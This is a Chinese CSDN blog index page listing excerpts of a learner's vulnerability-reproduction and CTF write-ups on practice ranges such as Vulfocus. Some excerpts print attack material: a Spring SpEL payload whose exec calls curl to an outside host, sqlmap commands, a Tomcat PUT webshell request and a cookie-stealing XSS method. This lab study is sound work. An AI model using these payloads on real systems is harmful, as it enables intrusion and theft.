自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

00勇士王子的博客

实迷途其未远,觉今是而昨非

  • 博客(103)
  • 资源 (1)
  • 收藏
  • 关注

原创 [Vulfocus解题系列] 所复现漏洞总结

前言写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。已复现的Vulfocus靶场漏洞Struts2-052远程代码执行(CVE-2017-9805)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源

2021-07-14 10:36:20 12622 1

原创 CISP-PTE八套真题详解(侵删)

PTE八套模拟题详解,侵删

2023-12-02 21:26:21 3996 12

原创 vulnhub渗透测试靶场练习2

VulnHub靶机-easy_cloudantivirus

2023-09-02 23:55:46 537

原创 vulnhub渗透测试靶场练习1

一次完整的渗透测试靶场练习

2023-05-20 23:04:57 922 1

原创 [Vulfocus解题系列]Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。影响版本:Spring Web Flow 2.4.0 到 2.4.4。

2023-03-29 11:28:47 408

原创 [Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

2023-03-23 10:58:36 483

原创 redis getshell方法

redis getshell方法总结

2023-03-07 16:09:23 1614

原创 Linux入侵检测方法

1进程2端口3日志4流量5计划。

2023-03-05 22:51:47 1110

原创 Nacos未授权访问漏洞

一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。

2023-02-27 11:20:30 6093

原创 web日志分析系统(课程设计作业)

web日志分析系统部署过程,使用的网上的开源代码,记录下部署过程

2023-02-27 10:10:05 354

原创 MSF中meterpreter和普通shell的区别

使用wireshark流量分析证明MSF中meterprete和普通shell的区别

2022-09-24 10:51:11 2191 2

转载 常见编辑器漏洞汇总【超全】(转载)

以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件和文件内容标识。

2022-09-15 10:51:58 4358

原创 记一次解决wordpress数据库报错事件

遇到问题多百度,docker用完就关,别一直留着占用服务器资源

2022-07-27 22:48:43 368

原创 [Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)

前言Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞

2022-03-22 19:09:28 5604

原创 Springboot heapdump信息泄露漏洞

详细内容参考博客:https://www.cnblogs.com/snowie/p/15561081.html#12heapdump我这里遇到一个站,记录一下:发现heapdump泄露,下载文件使用工具进行分析,可以查找到datasource的密码,危害很大工具下载链接https://www.eclipse.org/mat/downloads.php最后漏洞定级为中级...

2022-02-18 14:47:00 8432 1

原创 python request重定向踩坑记录

python request重定向踩坑记录写POC的时候,遇到一个问题,用burp验证成功,但成python脚本却一直验证失败,感觉写的代码没问题,多次尝试无果后,经过大师傅提示,看一下发出的包和burp发出的包有什么区别,就去网上查python如何获取完整的HTTP请求,找到了如下方法:方法来源:https://stackoverflow.com/questions/10588644/how-can-i-see-the-entire-http-request-thats-being-sent-by-m

2022-01-14 11:51:31 450

原创 [Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)

简介PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/靶场搭建使用在线靶场http://vulfocus.fofa.so进入环境,发现需要获取授权码https://www.pboot

2022-01-12 16:21:06 6998 1

原创 [Vulfocus解题系列]skywalking SQL注入 (CVE-2020-9483)

描述Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。复现过程注:本次复现使用在线靶场http://vulfocus.fofa.so打开环境加上路径抓包 /graphql改成post,加上payload,利用报错注入

2022-01-12 15:30:43 3638 3

原创 [Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)

介绍Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。靶场搭建进入指定漏洞路径,执行命令docker-c

2022-01-06 17:57:54 838

原创 [Vulfocus解题系列]spring 代码执行 (CVE-2018-1273)

简介Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。复现过程使用在线靶场抓包改包,将data数据改为下面的payloadusername[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/

2022-01-05 15:59:47 2988

原创 [Vulfocus解题系列] Apache Solr 远程命令执行漏洞(CVE-2017-12629)

介绍影响版本Apache Solr 5.5.0到7.0.1版本复现过程docker搭建 Apache Solr 环境burp抓包改包POST /solr/demo/config HTTP/1.1Host:ip:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,appli

2022-01-05 14:46:39 2067

原创 [Vulfocus解题系列]Tomcat 远程代码执行漏洞(CVE-2017-12615)

介绍Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。复现过程访问根路径burp抓包修改第一行为PUT和增加POST请求体,修改后为PUT /shell.jsp/ HTTP/1.1Host: vulfocus.fofa.so:5

2022-01-03 21:03:01 1534

原创 [Vulfocus解题系列]weblogic 反序列化(CVE-2017-10271)

介绍Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通

2022-01-02 21:39:47 1737

原创 Pocsuite安装和简单使用(以vulfocus靶场测试)

介绍Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了我们的 Web 安全研究能力的领先。你可以直接使用 Pocsuite 进行漏洞的验证与利用;你也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架;同时,你还可以在你的漏洞测试工具里直接集成 Pocsuite,它也提供标准的调用类。安装github下载链接:https://github.com/known

2021-12-26 20:09:22 1908

原创 记一次CLTPHP渗透测试

前言本人使用的是本地搭建的CLTPHP5.5版本,请自行搭建。测试漏洞类型:任意文件删除漏洞、任意文件下载漏洞、文件上传漏洞渗透测试过程搭建好了之后是这个效果路径加admin进入后台登录页面因为主要是网站后台进行测试,所以我直接使用admin账号密码登录进去,搭建网站的时候看了一下,默认的admin密码是admin123成功进入后台首先看到一个可以删除sql文件的地方,可能存在任意文件删除漏洞burp抓个包看一下构造很明显,直接是sql文件的名字然后我直接在本地新建了一个66

2021-11-21 12:15:10 3596 1

原创 【封神台】cookie伪造目标权限

题目解题过程访问网站,是一个留言板先用普通的xss测试一下成功弹窗,说明地处存在xss漏洞选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc)原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo

2021-11-17 14:56:05 627

原创 【封神台】SQL注入绕过WAF练习(cookie注入)

题目解题过程进入网站随便点击一个新闻,出现参数id,进行单引号测试:提示参数不能包含非法字符,应该是黑名单过滤猜测是cookie注入burp抓包,将参数放入cookie中,页面正常访问:单引号测试,页面报错,没有警告弹出sqlmap跑出payloadpython sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2跑出表python sqlmap.py

2021-11-17 14:06:45 3427

原创 【封神台】SQL注入靶场练习(sqlmap)

靶场地址https://hack.zkaq.cn题目解题过程1.进入题目2.只有个 点击查看新闻,点击进入3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍查询数据库python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs因为我们需要获得管理员密码,所以要查maoshe数据库python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl

2021-11-01 21:47:23 11489

原创 数据挖掘实例2:分类规则 ONERULE方法

前言本实例采用python3环境,编辑器采用Jupyter Notebook实例介绍实验内容:使用著名的Iris植物分类数据集:集共有150条植物数据,每条数据都 给出了四个特征:sepal length、sepal width、petal length、petal width(分别表示萼片和花瓣的长 与宽),单位均为cm)。该数据集共有三种类别:Iris Setosa(山鸢尾)、Iris Versicolour(变色鸢尾)和Iris Virginica(维吉尼 亚鸢尾)。我们这里的分类目的是根据植物

2021-10-04 17:50:25 691

原创 数据挖掘实例1:亲和性分析示例(代码、注释、运行结果)

前言本实例采用python3环境,编辑器采用Jupyter Notebook,安装使用方法请参考,本实例中所用到的附件内容放在文末,如果想要自行运行一下代码,可以尝试一下。Jupyter Notebook介绍、安装及使用教程亲和性分析示例终于迎来了第一个数据挖掘的例子,我们拿这个亲和性分析的示例来具体看下数据挖掘到底是怎么回事。数据挖掘有个常见的应用场景,即顾客在购买一件商品时,商家可以趁机了解他们还想买什么,以便把多数顾客愿意同时购买的商品放到一起销售以提升销售额。当商家收集到足够多的数据时

2021-10-03 17:28:49 3993 2

原创 [Vulfocus解题系列] phpmyadmin SQL注入 (CVE-2020-5504)

漏洞介绍名称: phpmyadmin SQL注入 (CVE-2020-5504)描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。解题过程1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,

2021-10-01 18:17:29 3524 2

原创 xss-challenge-tour(XSS靶场)1-10

第一关第一关是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗<script>alert(‘xss’)</script>payload<script>alert('xss')</script>第二关直接输入第一关的代码,没有弹窗,F12看一下代码,尝试进行闭合下面是包含我们之前输入的内容的代码<input name="keyword" value="<script>alert(/xss/)</scr.

2021-09-06 22:29:52 780 2

原创 Victor CMS 未授权sql注入(CVE-2020-29280)

漏洞名称Victor CMS 未授权sql注入漏洞等级高危爆发时间2020-11-27漏洞简介Victor CMS是一个简单的内容管理系统。Victor CMS存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。影响版本The Victor CMS v1.0漏洞复现这里用的是云演的在线环境,这个漏洞的环境是免费的打开漏洞环境,根据漏洞描述,漏洞应该存在于search搜索框用burp抓搜索框的包,发现是传入的是post参数search单引号报错加上注释后页面返回正常

2021-08-08 17:55:36 743

原创 [Pikachu靶场实战系列]RCE(远程系统命令执行)

RCE介绍exec “ping”可以输入一个ip地址,结果发现页面无回显,难道不应该回显Ping命令的结果吗,不过我们不管他,继续下一步。在ip后用&分割再输入一个ls命令,发现ls命令被执行了说明开发者没有做严格的安全控制,没有想到我们会多输入一个命令。可以随意执行命令,危害性是很大的。...

2021-08-06 19:02:02 278

原创 python正则表达式知识点总结

正则表达式语法行定位符“^”表示行的开始,“$”表示行的结尾^tm #可以匹配以tm开头的行tm$ #可以匹配以tm结尾的行tm #可以匹配含有tm的行元字符代码说明.匹配除换行符以外的任意字符\w匹配字母或数字或下划线或汉字\s匹配任意的空白符\d匹配数字\b匹配单词的开始或结束^匹配字符串的开始$匹配字符串的结束重复限定符(指定数量的字

2021-08-04 13:01:59 287

原创 攻防世界Web高手进阶区WP(unserialize3)

unserialize3打开环境,是一段代码function用于声明函数PHP 的魔术方法函数由上图可知,__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的,但是在题目代码中并没有序列化字符串。于是,我们这里实例化xctf类并对其使用序列化(这里就实例化xctf类为对象a)<?phpclass xctf{ //定义一个名为xctf的类public $flag = '111'; /

2021-08-03 19:46:37 213

原创 攻防世界Web高手进阶区WP(upload1)

upload1典型的文件上传题,先试着上传一句话木马1.php文件:被拦住了,查看源码,看看是什么拦住了,发现是一段js代码那就先将后缀改为jpg,上传时候抓包然后在包里将后缀改回php,上传成功了蚁剑连接找到flag...

2021-08-02 22:00:00 324

原创 攻防世界Web高手进阶区WP(PHP2)

PHP2打开题目环境没啥线索,开御剑扫了 一下,也没扫出来啥东西看了别人的wp,说能扫出来一个index.phps,可以看到源码(看来是我的御剑字典不够强大)我去查了一下phps文件:phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。回来看代码,页面中的代码明显不

2021-08-02 21:36:54 508 1

原创 [Pikachu靶场实战系列] SQL注入(宽字节注入)

宽字节注入原理在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;%5c被吃掉了,单引号由此逃逸可以用来闭合语句。使用PHP函数iconv(‘

2021-08-01 11:12:06 3164 2

原创 攻防世界Web高手进阶区WP(7、8)

NewsCenter打开环境,首先看到一个搜索框试试有没有注入,加上单引号网页会跳转到空白页加上注释后页面返回正常,注入点存在抓包,发现传参方式为post然后直接sqlmap一把梭,post注入需要将post包下载为txt文件爆数据库python sqlmap.py -r C:\Users\dell\Desktop\1.txt --dbs爆表python sqlmap.py -r C:\Users\dell\Desktop\1.txt -D news --tables

2021-07-30 21:03:16 152

蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py

自己写的批量扫描脚本,很好用,可以借鉴一下

2021-08-28

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除